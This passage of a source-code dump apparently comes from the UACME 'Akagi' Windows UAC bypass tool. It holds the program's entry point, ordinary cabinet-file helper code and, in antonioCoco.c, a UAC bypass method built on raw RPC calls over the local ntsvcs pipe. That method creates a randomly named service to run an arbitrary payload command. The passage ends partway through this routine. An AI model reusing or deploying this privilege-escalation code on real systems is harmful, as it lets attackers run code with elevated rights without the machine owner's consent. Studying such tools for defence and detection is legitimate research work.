Status);\n\n if (!NT_SUCCESS(Status))\n return Status;\n\n supMasqueradeProcess(FALSE);\n\n return MethodsManagerCall(method);\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\n#pragma comment(linker, \"/ENTRY:main\")\nVOID __cdecl main()\n{\n#ifdef _UCM_CONSOLE\n ULONG result;\n\n result = StubInit(ucmMain);\n ucmConsolePrintValueUlong(TEXT(\"[+] ucmMain\"), result, TRUE);\n ucmConsoleRelease();\n ExitProcess(result);\n\n#else\n ExitProcess(StubInit(ucmMain));\n#endif\n}\n"
},
{
"path": "Source/Akagi/makecab.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2020\n*\n* TITLE: MAKECAB.C\n*\n* VERSION: 3.24\n*\n* DATE: 20 Apr 2020\n*\n* Simplified Cabinet file support for makecab utility replacement.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"makecab.h\"\n\n#pragma comment(lib, \"cabinet.lib\")\n\n/*\n** CAB Callbacks START\n*/\n\nLPVOID DIAMONDAPI fnFCIALLOC(\n ULONG cb\n)\n{\n return supHeapAlloc((SIZE_T)cb);\n}\n\nVOID DIAMONDAPI fnFCIFREE(\n VOID HUGE *lpMem\n)\n{\n if (lpMem) supHeapFree((PVOID)lpMem);\n}\n\nINT_PTR DIAMONDAPI fnFCIOPEN(\n LPSTR pszFile,\n int oflag,\n int pmode,\n int FAR *err,\n void FAR *pv\n)\n{\n HANDLE hFile = NULL;\n DWORD dwDesiredAccess = 0;\n DWORD dwCreationDisposition = 0;\n\n UNREFERENCED_PARAMETER(pv);\n UNREFERENCED_PARAMETER(pmode);\n\n if (oflag & _O_RDWR) {\n dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;\n }\n else if (oflag & _O_WRONLY) {\n dwDesiredAccess = GENERIC_WRITE;\n }\n else {\n dwDesiredAccess = GENERIC_READ;\n }\n\n if (oflag & _O_CREAT) {\n dwCreationDisposition = CREATE_ALWAYS;\n }\n else {\n dwCreationDisposition = OPEN_EXISTING;\n }\n\n hFile = CreateFileA(pszFile,\n dwDesiredAccess,\n FILE_SHARE_READ,\n NULL,\n dwCreationDisposition,\n FILE_ATTRIBUTE_NORMAL,\n NULL);\n\n if (hFile == INVALID_HANDLE_VALUE) {\n *err = GetLastError();\n }\n\n return (INT_PTR)hFile;\n}\n\nUINT DIAMONDAPI fnFCIREAD(\n INT_PTR hf,\n void FAR *memory,\n UINT cb,\n int FAR *err,\n void FAR *pv\n)\n{\n DWORD dwBytesRead = 0;\n\n UNREFERENCED_PARAMETER(pv);\n\n if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL) == FALSE) {\n dwBytesRead = (DWORD)-1;\n if (err) {\n *err = GetLastError();\n }\n }\n return dwBytesRead;\n}\n\nUINT DIAMONDAPI fnFCIWRITE(\n INT_PTR hf,\n void FAR *memory,\n UINT cb,\n int FAR *err,\n void FAR *pv\n)\n{\n DWORD dwBytesWritten = 0;\n\n UNREFERENCED_PARAMETER(pv);\n\n if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL) == FALSE) {\n dwBytesWritten = (DWORD)-1;\n if (err) {\n *err = GetLastError();\n }\n }\n return dwBytesWritten;\n}\n\nint DIAMONDAPI fnFCICLOSE(\n INT_PTR hf,\n int FAR *err,\n void FAR *pv\n)\n{\n INT iResult = 0;\n\n UNREFERENCED_PARAMETER(pv);\n\n if (CloseHandle((HANDLE)hf) == FALSE) {\n if (err) {\n *err = GetLastError();\n }\n iResult = -1;\n }\n return iResult;\n}\n\nlong DIAMONDAPI fnFCISEEK(\n INT_PTR hf,\n long dist,\n int seektype,\n int FAR *err,\n void FAR *pv\n)\n{\n INT iResult = 0;\n // LARGE_INTEGER mdist, ndist;\n\n UNREFERENCED_PARAMETER(pv);\n\n /* \n sdist.LowPart = dist;\n mdist.HighPart = 0;\n ndist.LowPart = 0;\n ndist.HighPart = 0;\n if (!SetFilePointerEx((HANDLE)hf, mdist, &ndist, seektype)) {\n if (err) *err = GetLastError();\n }\n return ndist.LowPart;\n */\n\n iResult = SetFilePointer((HANDLE)hf, dist, NULL, seektype); //-V303\n if (iResult == -1) {\n if (err) {\n *err = GetLastError();\n }\n }\n return iResult;\n}\n\nint DIAMONDAPI fnFCIDELETE(\n LPSTR pszFile,\n int FAR *err,\n void FAR *pv\n)\n{\n INT iResult = 0;\n\n UNREFERENCED_PARAMETER(pv);\n\n if (DeleteFileA(pszFile) == FALSE) {\n if (err) {\n *err = GetLastError();\n }\n iResult = -1;\n }\n return iResult;\n}\n\nlong DIAMONDAPI fnFCISTATUS(\n UINT typeStatus,\n ULONG cb1,\n ULONG cb2,\n void FAR *pv\n)\n{\n UNREFERENCED_PARAMETER(typeStatus);\n UNREFERENCED_PARAMETER(cb1);\n UNREFERENCED_PARAMETER(cb2);\n UNREFERENCED_PARAMETER(pv);\n\n return 0; //not implemented\n}\n\nint DIAMONDAPI fnFCIFILEPLACED(\n PCCAB pccab,\n LPSTR pszFile,\n long cbFile,\n BOOL fContinuation,\n void FAR *pv\n)\n{\n UNREFERENCED_PARAMETER(pccab);\n UNREFERENCED_PARAMETER(pszFile);\n UNREFERENCED_PARAMETER(cbFile);\n UNREFERENCED_PARAMETER(fContinuation);\n UNREFERENCED_PARAMETER(pv);\n\n return 0; //not implemented\n}\n\nINT_PTR DIAMONDAPI fnFCIGETOPENINFO(\n LPSTR pszName,\n USHORT *pdate,\n USHORT *ptime,\n USHORT *pattribs,\n int FAR *err,\n void FAR *pv\n)\n{\n HANDLE hFile;\n FILETIME fileTime;\n BY_HANDLE_FILE_INFORMATION fileInfo;\n\n hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);\n\n if (hFile != INVALID_HANDLE_VALUE)\n {\n if (GetFileInformationByHandle(hFile, &fileInfo)\n && FileTimeToLocalFileTime(&fileInfo.ftCreationTime, &fileTime)\n && FileTimeToDosDateTime(&fileTime, pdate, ptime))\n {\n *pattribs = (USHORT)fileInfo.dwFileAttributes;\n *pattribs &= (\n FILE_ATTRIBUTE_READONLY |\n FILE_ATTRIBUTE_HIDDEN |\n FILE_ATTRIBUTE_SYSTEM |\n FILE_ATTRIBUTE_ARCHIVE\n );\n }\n else\n {\n fnFCICLOSE((INT_PTR)hFile, err, pv);\n hFile = INVALID_HANDLE_VALUE;\n }\n }\n\n return (INT_PTR)hFile;\n}\n\nBOOL DIAMONDAPI fnFCIGETTEMPFILE(\n char *pszTempName,\n int cbTempName,\n void FAR *pv\n)\n{\n BOOL bSucceeded = FALSE;\n SIZE_T cch;\n CHAR szTempPath[MAX_PATH];\n CHAR szTempFile[MAX_PATH];\n\n UNREFERENCED_PARAMETER(pv);\n\n RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));\n RtlSecureZeroMemory(szTempFile, sizeof(szTempFile));\n\n if (GetTempPathA(MAX_PATH, szTempPath) != 0) {\n if (GetTempFileNameA(szTempPath, \"ucm\", 0, szTempFile) != 0) {\n DeleteFileA(szTempFile);\n cch = (SIZE_T)(cbTempName / sizeof(CHAR));\n _strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));\n bSucceeded = TRUE;\n }\n }\n\n return bSucceeded;\n}\n\nBOOL DIAMONDAPI fnFCIGETNEXTCABINET(\n PCCAB pccab,\n ULONG cbPrevCab,\n void FAR *pv\n)\n{\n UNREFERENCED_PARAMETER(pccab);\n UNREFERENCED_PARAMETER(cbPrevCab);\n UNREFERENCED_PARAMETER(pv);\n\n return FALSE;\n}\n\n/*\n** CAB Callbacks END\n*/\n\n/*\n* cabCreate\n*\n* Purpose:\n*\n* Initialize cabinet class object.\n*\n*/\nCABDATA *cabCreate(\n _In_ LPWSTR lpszCabName\n)\n{\n PCABDATA pCabinet;\n CHAR szCab[CB_MAX_CABINET_NAME];\n\n if (lpszCabName == NULL) {\n return NULL;\n }\n\n RtlSecureZeroMemory(szCab, sizeof(szCab));\n if (WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCab, CB_MAX_CABINET_NAME - 2, 0, NULL) == 0) {\n return NULL;\n }\n\n pCabinet = (PCABDATA)supHeapAlloc(sizeof(CABDATA));\n if (pCabinet == NULL)\n return NULL;\n\n _strcpy_a(pCabinet->cab.szCab, szCab); //Full name with path or only name (current folder then).\n\n pCabinet->cab.cb = 0x7FFFFFFF; //Maximum cabinet size in bytes.\n\n pCabinet->hfci = FCICreate(\n &pCabinet->erf,\n fnFCIFILEPLACED,\n fnFCIALLOC,\n fnFCIFREE,\n fnFCIOPEN,\n fnFCIREAD,\n fnFCIWRITE,\n fnFCICLOSE,\n fnFCISEEK,\n fnFCIDELETE,\n fnFCIGETTEMPFILE,\n &pCabinet->cab,\n NULL);\n\n if (pCabinet->hfci == NULL) {\n supHeapFree(pCabinet);\n pCabinet = NULL;\n }\n return pCabinet;\n}\n\n/*\n* cabAddFile\n*\n* Purpose:\n*\n* Insert given file to the previously initialized cabinet object.\n*\n*/\nBOOL cabAddFile(\n _In_ CABDATA *Cabinet,\n _In_ LPWSTR lpszFileName,\n _In_ LPWSTR lpszInternalName\n)\n{\n BOOL bResult = FALSE;\n CHAR szFileName[CB_MAX_FILENAME];\n CHAR szInternalName[CB_MAX_FILENAME];\n\n do {\n\n if (Cabinet == NULL) {\n break;\n }\n\n //convert filename to ansi\n RtlSecureZeroMemory(szFileName, sizeof(szFileName));\n if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szFileName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {\n break;\n }\n //convert internal name to ansi\n RtlSecureZeroMemory(szInternalName, sizeof(szInternalName));\n if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szInternalName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {\n break;\n }\n\n bResult = FCIAddFile(Cabinet->hfci, (char*)szFileName, (char*)szInternalName, FALSE,\n fnFCIGETNEXTCABINET, fnFCISTATUS, fnFCIGETOPENINFO, tcompTYPE_NONE /*tcompTYPE_MSZIP*/);\n\n } while (FALSE);\n\n return bResult;\n}\n\n/*\n* cabClose\n*\n* Purpose:\n*\n* Flush file and destroy cabinet class.\n*\n*/\nVOID cabClose(\n _In_ CABDATA *Cabinet\n)\n{\n if (Cabinet == NULL) {\n return;\n }\n\n FCIFlushCabinet(\n Cabinet->hfci,\n FALSE,\n fnFCIGETNEXTCABINET,\n fnFCISTATUS\n );\n\n FCIDestroy(Cabinet->hfci);\n supHeapFree(Cabinet);\n}\n"
},
{
"path": "Source/Akagi/makecab.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n* TITLE: MAKECAB.H\n*\n* VERSION: 2.70\n*\n* DATE: 25 Mar 2017\n*\n* Prototypes and definitions for makecab module.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#include \n#include \n\ntypedef struct _CABDATA {\n ERF erf;\n CCAB cab;\n HFCI hfci;\n} CABDATA, *PCABDATA;\n\nCABDATA *cabCreate(\n _In_ LPWSTR lpszCabName);\n\nBOOL cabAddFile(\n _In_ CABDATA *Cabinet,\n _In_ LPWSTR lpszFileName,\n _In_ LPWSTR lpszInternalName);\n\nVOID cabClose(\n _In_ CABDATA *Cabinet);\n"
},
{
"path": "Source/Akagi/methods/antonioCoco.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2023 - 2025\n*\n* TITLE: ANTONIOCOCO.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* UAC bypass method from antonioCoco.\n*\n* https://github.com/antonioCoco/SspiUacBypass\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n#define MAX_MESSAGE_SIZE 12000\n\n// rpc command ids\n#define RPC_CMD_ID_OPEN_SC_MANAGERW 15\n#define RPC_CMD_ID_CREATE_SERVICEW 12\n#define RPC_CMD_ID_START_SERVICEW 19\n#define RPC_CMD_ID_DELETE_SERVICE 2\n\n// rpc command output lengths\n#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24\n#define RPC_OUTPUT_LENGTH_CREATE_SERVICE 28\n#define RPC_OUTPUT_LENGTH_START_SERVICE 4\n#define RPC_OUTPUT_LENGTH_DELETE_SERVICE 4\n\n#define MAX_RPC_PACKET_LENGTH 4096\n#define MAX_PROCEDURE_DATA_LENGTH 2048\n\n#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) (((((VALUE_LENGTH) + (ALIGN_BYTES) - 1) / (ALIGN_BYTES)) * (ALIGN_BYTES)) - (VALUE_LENGTH))\n\n// {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR)\n#define RPC_NDR_UUID (RPC_WSTR)L\"8a885d04-1ceb-11c9-9fe8-08002b104860\"\n#define SVCCTL_UUID (RPC_WSTR)L\"367abb81-9844-35f1-ad32-98f038001003\"\n\ntypedef struct _RPC_BASE_HEADER {\n WORD wVersion;\n BYTE bPacketType;\n BYTE bPacketFlags;\n DWORD dwDataRepresentation;\n WORD wFragLength;\n WORD wAuthLength;\n DWORD dwCallIndex;\n} RPC_BASE_HEADER, * PRPC_BASE_HEADER;\n\ntypedef struct _RPC_REQUEST_HEADER {\n DWORD dwAllocHint;\n WORD wContextID;\n WORD wProcedureNumber;\n} RPC_REQUEST_HEADER, * PRPC_REQUEST_HEADER;\n\ntypedef struct _RPC_RESPONSE_HEADER {\n DWORD dwAllocHint;\n WORD wContextID;\n BYTE bCancelCount;\n BYTE bAlign[1];\n} RPC_RESPONSE_HEADER, * PRPC_RESPONSE_HEADER;\n\ntypedef struct _RPC_BIND_REQUEST_CONTEXT_ENTRY {\n WORD wContextID;\n WORD wTransItemCount;\n UUID InterfaceUUID;\n DWORD dwInterfaceVersion;\n UUID TransferSyntaxUUID;\n DWORD dwTransferSyntaxVersion;\n} RPC_BIND_REQUEST_CONTEXT_ENTRY, * PRPC_BIND_REQUEST_CONTEXT_ENTRY;\n\ntypedef struct _RPC_BIND_REQUEST_HEADER {\n WORD wMaxSendFrag;\n WORD wMaxRecvFrag;\n DWORD dwAssocGroup;\n BYTE bContextCount;\n BYTE bAlign[3];\n RPC_BIND_REQUEST_CONTEXT_ENTRY Context;\n} RPC_BIND_REQUEST_HEADER, * PRPC_BIND_REQUEST_HEADER;\n\ntypedef struct _RPC_BIND_RESPONSE_CONTEXT_ENTRY {\n WORD wResult;\n WORD wAlign;\n BYTE bTransferSyntax[16];\n DWORD dwTransferSyntaxVersion;\n} RPC_BIND_RESPONSE_CONTEXT_ENTRY, * PRPC_BIND_RESPONSE_CONTEXT_ENTRY;\n\ntypedef struct _RPC_BIND_RESPONSE_HEADER1 {\n WORD wMaxSendFrag;\n WORD wMaxRecvFrag;\n DWORD dwAssocGroup;\n} RPC_BIND_RESPONSE_HEADER1, * PRPC_BIND_RESPONSE_HEADER1;\n\ntypedef struct _RPC_BIND_RESPONSE_HEADER2 {\n DWORD dwContextResultCount;\n RPC_BIND_RESPONSE_CONTEXT_ENTRY Context;\n} RPC_BIND_RESPONSE_HEADER2, * PRPC_BIND_RESPONSE_HEADER2;\n\ntypedef struct _RPC_CONNECTION {\n HANDLE hFile;\n DWORD dwCallIndex;\n DWORD dwInputError;\n DWORD dwRequestInitialized;\n BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH];\n DWORD dwProcedureInputDataLength;\n BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH];\n DWORD dwProcedureOutputDataLength;\n} RPC_CONNECTION, * PRPC_CONNECTION;\n\nBOOL ucmxRpcBind(\n _In_ PRPC_CONNECTION pRpcConnection,\n _In_ RPC_WSTR pInterfaceUUID,\n _In_ DWORD dwInterfaceVersion)\n{\n RPC_BASE_HEADER RpcBaseHeader;\n RPC_BIND_REQUEST_HEADER RpcBindRequestHeader;\n DWORD dwBytesWritten = 0;\n DWORD dwBytesRead = 0;\n BYTE bResponseData[MAX_RPC_PACKET_LENGTH];\n RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;\n RPC_BIND_RESPONSE_HEADER1* pRpcBindResponseHeader1 = NULL;\n RPC_BIND_RESPONSE_HEADER2* pRpcBindResponseHeader2 = NULL;\n BYTE* pSecondaryAddrHeaderBlock = NULL;\n WORD wSecondaryAddrLen = 0;\n DWORD dwSecondaryAddrAlign = 0;\n\n //\n // Set base header details.\n //\n RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));\n RpcBaseHeader.wVersion = 5;\n RpcBaseHeader.bPacketType = 11;\n RpcBaseHeader.bPacketFlags = 3;\n RpcBaseHeader.dwDataRepresentation = 0x10;\n RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader);\n RpcBaseHeader.wAuthLength = 0;\n RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;\n\n //\n // Set bind request header details.\n //\n RtlSecureZeroMemory(&RpcBindRequestHeader, sizeof(RpcBindRequestHeader));\n RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH;\n RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH;\n RpcBindRequestHeader.dwAssocGroup = 0;\n RpcBindRequestHeader.bContextCount = 1;\n RpcBindRequestHeader.Context.wContextID = 0;\n RpcBindRequestHeader.Context.wTransItemCount = 1;\n RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2;\n\n if (RPC_S_OK != UuidFromString(pInterfaceUUID, &RpcBindRequestHeader.Context.InterfaceUUID))\n return FALSE;\n\n RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion;\n if (RPC_S_OK != UuidFromString(RPC_NDR_UUID, &RpcBindRequestHeader.Context.TransferSyntaxUUID))\n return FALSE;\n\n //\n // Write base header.\n //\n if (!WriteFile(pRpcConnection->hFile,\n &RpcBaseHeader,\n sizeof(RpcBaseHeader),\n &dwBytesWritten,\n NULL))\n {\n return FALSE;\n }\n\n //\n // Write bind request header.\n //\n if (!WriteFile(pRpcConnection->hFile,\n &RpcBindRequestHeader,\n sizeof(RpcBindRequestHeader),\n &dwBytesWritten,\n NULL))\n {\n return FALSE;\n }\n\n pRpcConnection->dwCallIndex++;\n\n //\n // Get bind response.\n //\n RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));\n if (!ReadFile(pRpcConnection->hFile,\n bResponseData,\n sizeof(bResponseData),\n &dwBytesRead,\n NULL))\n {\n return FALSE;\n }\n\n //\n // Get a ptr to the base response header.\n //\n pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;\n\n //\n // Validate base response header.\n //\n if ((pRpcResponseBaseHeader->wVersion != 5) ||\n (pRpcResponseBaseHeader->bPacketType != 12) ||\n (pRpcResponseBaseHeader->bPacketFlags != 3) ||\n (pRpcResponseBaseHeader->wFragLength != dwBytesRead))\n {\n return FALSE;\n }\n\n //\n // Get a ptr to the main bind response header body.\n // \n pRpcBindResponseHeader1 = (PRPC_BIND_RESPONSE_HEADER1)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));\n\n //\n // Get secondary addr header ptr.\n //\n pSecondaryAddrHeaderBlock = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcBindResponseHeader1, sizeof(RPC_BIND_RESPONSE_HEADER1));\n wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock;\n\n //\n // Validate secondary addr length.\n //\n if (wSecondaryAddrLen > 256)\n return FALSE;\n\n //\n // Calculate padding for secondary addr value if necessary.\n //\n dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), sizeof(ULONG));\n\n //\n // Get a ptr to the main bind response header body (after the variable-length secondary addr field).\n //\n pRpcBindResponseHeader2 = (PRPC_BIND_RESPONSE_HEADER2)RtlOffsetToPointer((BYTE*)pSecondaryAddrHeaderBlock,\n sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign);\n\n //\n // Validate context count.\n // Ensure the result value for context #1 was successful.\n //\n if ((pRpcBindResponseHeader2->dwContextResultCount != 1) ||\n (pRpcBindResponseHeader2->Context.wResult != 0))\n {\n return FALSE;\n }\n\n return TRUE;\n}\n\nBOOL ucmxRpcConnect(\n _In_ LPCWSTR lpPipeName,\n _In_ RPC_WSTR pInterfaceUUID,\n _In_ DWORD dwInterfaceVersion,\n _In_ PRPC_CONNECTION pRpcConnection)\n{\n HANDLE hFile = NULL;\n WCHAR szPipePath[MAX_PATH * 2];\n RPC_CONNECTION RpcConnection;\n\n //\n // Set pipe path.\n //\n RtlSecureZeroMemory(szPipePath, sizeof(szPipePath));\n _strcpy(szPipePath, TEXT(\"\\\\\\\\127.0.0.1\\\\pipe\\\\\"));\n _strcat(szPipePath, lpPipeName);\n\n //\n // Open rpc pipe.\n //\n hFile = CreateFile(szPipePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);\n if (hFile == INVALID_HANDLE_VALUE)\n return FALSE;\n\n //\n // Initialize rpc connection data.\n //\n RtlSecureZeroMemory(&RpcConnection, sizeof(RpcConnection));\n RpcConnection.hFile = hFile;\n RpcConnection.dwCallIndex = 1;\n\n //\n // Bind rpc connection.\n //\n if (!ucmxRpcBind(&RpcConnection, pInterfaceUUID, dwInterfaceVersion))\n return FALSE;\n\n //\n // Store connection data.\n //\n RtlCopyMemory(pRpcConnection, &RpcConnection, sizeof(RpcConnection));\n\n return TRUE;\n}\n\nVOID ucmxRpcInitializeRequestData(\n _In_ PRPC_CONNECTION pRpcConnection)\n{\n //\n // Initialize request data.\n //\n RtlSecureZeroMemory(pRpcConnection->bProcedureInputData, sizeof(pRpcConnection->bProcedureInputData));\n pRpcConnection->dwProcedureInputDataLength = 0;\n RtlSecureZeroMemory(pRpcConnection->bProcedureOutputData, sizeof(pRpcConnection->bProcedureOutputData));\n pRpcConnection->dwProcedureOutputDataLength = 0;\n\n //\n // Reset input error flag.\n //\n pRpcConnection->dwInputError = 0;\n\n pRpcConnection->dwRequestInitialized = 1;\n}\n\nBOOL ucmxRpcSendRequest(\n _In_ PRPC_CONNECTION pRpcConnection,\n _In_ DWORD dwProcedureNumber)\n{\n RPC_BASE_HEADER RpcBaseHeader;\n RPC_REQUEST_HEADER RpcRequestHeader;\n DWORD dwBytesWritten = 0;\n BYTE bResponseData[MAX_RPC_PACKET_LENGTH];\n RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL;\n RPC_RESPONSE_HEADER* pRpcResponseHeader = NULL;\n DWORD dwProcedureResponseDataLength = 0;\n DWORD dwBytesRead = 0;\n BYTE* pTempProcedureResponseDataPtr = NULL;\n\n //\n // Ensure rpc request has been initialized.\n //\n if (pRpcConnection->dwRequestInitialized == 0)\n return FALSE;\n\n //\n // Clear initialised flag.\n //\n pRpcConnection->dwRequestInitialized = 0;\n\n //\n // Check for input errors.\n //\n if (pRpcConnection->dwInputError != 0)\n return FALSE;\n\n //\n // Set base header details.\n //\n RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader));\n RpcBaseHeader.wVersion = 5;\n RpcBaseHeader.bPacketType = 0;\n RpcBaseHeader.bPacketFlags = 3;\n RpcBaseHeader.dwDataRepresentation = 0x10;\n RpcBaseHeader.wFragLength = (WORD)(sizeof(RPC_BASE_HEADER) + sizeof(RPC_REQUEST_HEADER) + pRpcConnection->dwProcedureInputDataLength);\n RpcBaseHeader.wAuthLength = 0;\n RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex;\n\n //\n // Set request header details.\n //\n RtlSecureZeroMemory(&RpcRequestHeader, sizeof(RpcRequestHeader));\n RpcRequestHeader.dwAllocHint = 0;\n RpcRequestHeader.wContextID = 0;\n RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber;\n\n //\n // Write base header.\n //\n if (!WriteFile(pRpcConnection->hFile,\n &RpcBaseHeader,\n sizeof(RpcBaseHeader),\n &dwBytesWritten, NULL))\n {\n return FALSE;\n }\n\n //\n // Write request header.\n //\n if (!WriteFile(pRpcConnection->hFile,\n &RpcRequestHeader,\n sizeof(RpcRequestHeader),\n &dwBytesWritten,\n NULL))\n {\n return FALSE;\n }\n\n //\n // Write request body.\n //\n if (!WriteFile(pRpcConnection->hFile,\n pRpcConnection->bProcedureInputData,\n pRpcConnection->dwProcedureInputDataLength,\n &dwBytesWritten,\n NULL))\n {\n return FALSE;\n }\n\n //\n // Increase call index.\n //\n pRpcConnection->dwCallIndex++;\n\n //\n // Get bind response.\n //\n RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData));\n if (!ReadFile(pRpcConnection->hFile,\n bResponseData,\n sizeof(bResponseData),\n &dwBytesRead,\n NULL))\n {\n return FALSE;\n }\n\n //\n // Get a ptr to the base response header.\n //\n pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData;\n\n //\n // Validate base response header.\n //\n if ((pRpcResponseBaseHeader->wVersion != 5) ||\n (pRpcResponseBaseHeader->bPacketType != 2) ||\n (pRpcResponseBaseHeader->bPacketFlags != 3) ||\n (pRpcResponseBaseHeader->wFragLength != dwBytesRead))\n {\n return FALSE;\n }\n\n //\n // Get a ptr to the main response header body.\n //\n pRpcResponseHeader = (RPC_RESPONSE_HEADER*)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER));\n\n //\n // Context ID must be 0.\n //\n if (pRpcResponseHeader->wContextID != 0)\n return FALSE;\n\n //\n // Calculate command response data length.\n //\n dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RPC_BASE_HEADER) - sizeof(RPC_RESPONSE_HEADER);\n\n //\n // Store response data.\n //\n if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData))\n return FALSE;\n\n pTempProcedureResponseDataPtr = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcResponseHeader, sizeof(RPC_RESPONSE_HEADER));\n RtlCopyMemory(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, dwProcedureResponseDataLength);\n\n //\n // Store response data length.\n //\n pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength;\n\n return TRUE;\n}\n\nBOOL ucmxRpcAppendRequestData_Binary(\n _In_ PRPC_CONNECTION RpcConnection,\n _In_ BYTE* Data,\n _In_ DWORD DataLength,\n _In_ BOOL IsUnicode)\n{\n DWORD dwBytesAvailable = 0;\n DWORD dwDataLength = DataLength;\n DWORD dwPadding = 0;\n\n if (IsUnicode)\n dwDataLength *= sizeof(WCHAR);\n\n //\n // Ensure the request has been initialized.\n //\n if (RpcConnection->dwRequestInitialized == 0)\n return FALSE;\n\n dwPadding = CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG));\n\n //\n // Calculate number of bytes remaining in the input buffer.\n //\n dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength;\n if ((dwDataLength + dwPadding) > dwBytesAvailable)\n {\n //\n // Set input error flag.\n //\n RpcConnection->dwInputError = 1;\n return FALSE;\n }\n\n //\n // Store data in buffer.\n //\n RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength);\n RpcConnection->dwProcedureInputDataLength += dwDataLength;\n RpcConnection->dwProcedureInputDataLength += dwPadding;\n\n return TRUE;\n}\n\nBOOL ucmxRpcAppendRequestData_Dword(\n _In_ PRPC_CONNECTION pRpcConnection,\n _In_ DWORD dwValue)\n{\n return ucmxRpcAppendRequestData_Binary(\n pRpcConnection,\n (BYTE*)&dwValue,\n sizeof(DWORD),\n FALSE);\n}\n\nBOOL ucmxInvokeCreateSvcRpcMain(\n _In_ LPWSTR lpszPayload)\n{\n BOOL bResult = FALSE;\n RPC_CONNECTION RpcConnection;\n BYTE bServiceManagerObject[20];\n BYTE bServiceObject[20];\n DWORD dwReturnValue = 0;\n DWORD dwServiceNameLength = 0;\n WCHAR szServiceName[32];\n DWORD dwServiceCommandLineLength = 0;\n\n RpcConnection.hFile = INVALID_HANDLE_VALUE;\n\n do {\n\n //\n // Generate random name for service.\n //\n szServiceName[0] = 0;\n supBinTextEncode(supGetTickCount64(), szServiceName);\n\n dwServiceNameLength = (DWORD)(_strlen(szServiceName) + 1);\n dwServiceCommandLineLength = (DWORD)(_strlen(lpszPayload) + 1);\n\n if (!ucmxRpcConnect(TEXT(\"ntsvcs\"), SVCCTL_UUID, 2, &RpcConnection))\n break;\n\n //\n // OpenSCManager.\n //\n ucmxRpcInitializeRequestData(&RpcConnection);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n ucmxRpcAppendRequestData_Dword(&RpcConnection, 0);\n 